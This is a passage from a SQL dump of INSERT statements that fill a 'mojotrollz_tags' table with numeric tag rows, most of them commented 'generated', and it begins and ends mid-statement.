`type`, `value`, `comment`) VALUES (15514, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15515, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15516, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15516, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15516, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15517, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15520, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15521, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15525, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15526, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15526, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15527, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15528, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15529, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15532, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15533, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15534, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15535, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15537, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15537, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15537, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15538, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15538, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15538, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15539, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15540, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15540, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15541, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15541, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15542, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15543, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15543, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15543, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15544, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15544, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15544, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15545, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15549, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15549, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15552, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15553, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15554, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15555, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15555, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15555, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15556, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15556, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15557, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15560, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15560, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15568, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15570, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15571, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15572, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15573, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15573, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15574, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15574, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15575, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15575, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15576, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15577, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15578, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15578, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15579, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15580, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15580, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15581, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15582, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15584, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15584, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15585, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15585, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15586, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15586, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15587, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15588, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15588, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15589, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15589, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15589, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15590, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15590, 1, 2, 3454, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15590, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15591, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15591, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15592, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15593, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15593, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15593, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15594, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15594, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15595, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15597, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15598, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15599, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15600, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15601, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15602, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15603, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15604, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15605, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15606, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15609, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15609, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15610, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15611, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 2, 1377, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15612, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15613, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15613, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15614, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15614, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15615, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15615, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 2, 1377, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 2, 1377, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15617, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15620, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15621, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15621, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15621, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15622, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15622, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15622, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15623, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15624, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15625, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15628, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15629, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15630, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15630, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15630, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15631, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15633, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15634, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15659, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15664, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15667, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15675, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15675, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15675, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15675, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15676, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15676, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15676, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15676, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15677, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15677, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15678, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15679, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15682, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15682, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` 